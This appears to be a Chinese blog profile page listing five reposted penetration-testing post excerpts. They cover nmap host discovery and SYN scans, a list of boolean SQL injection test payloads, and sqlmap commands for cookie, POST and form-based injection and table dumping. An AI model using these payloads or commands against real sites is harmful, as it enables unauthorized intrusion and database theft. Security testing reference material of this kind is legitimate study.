- 博客(5)
- 收藏
- 关注
转载 nmap常用命令以及脚本
转载自:http://www.4hou.com/technology/10481.html还有freebuf系列的文章都挺好https://www.cnblogs.com/MacoLee/articles/5714165.html4种常用的扫描1.nmap -sP 1.1.1.1/24探测C段存活主机,可以用 |grep up 过滤存活的主机2. nmap -sS 1.1....
2019-04-15 00:53:14 3739
转载 sql注入payload
分享一些平时测试用的sql payloads1:BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...
2019-04-12 15:12:50 3928
转载 sqlmap命令3
当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、...
2019-04-11 09:59:19 1143
转载 sqlmap命令2
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询...
2019-04-11 09:57:16 868
转载 sqlmap命令
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...
2019-04-11 09:51:22 1524
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人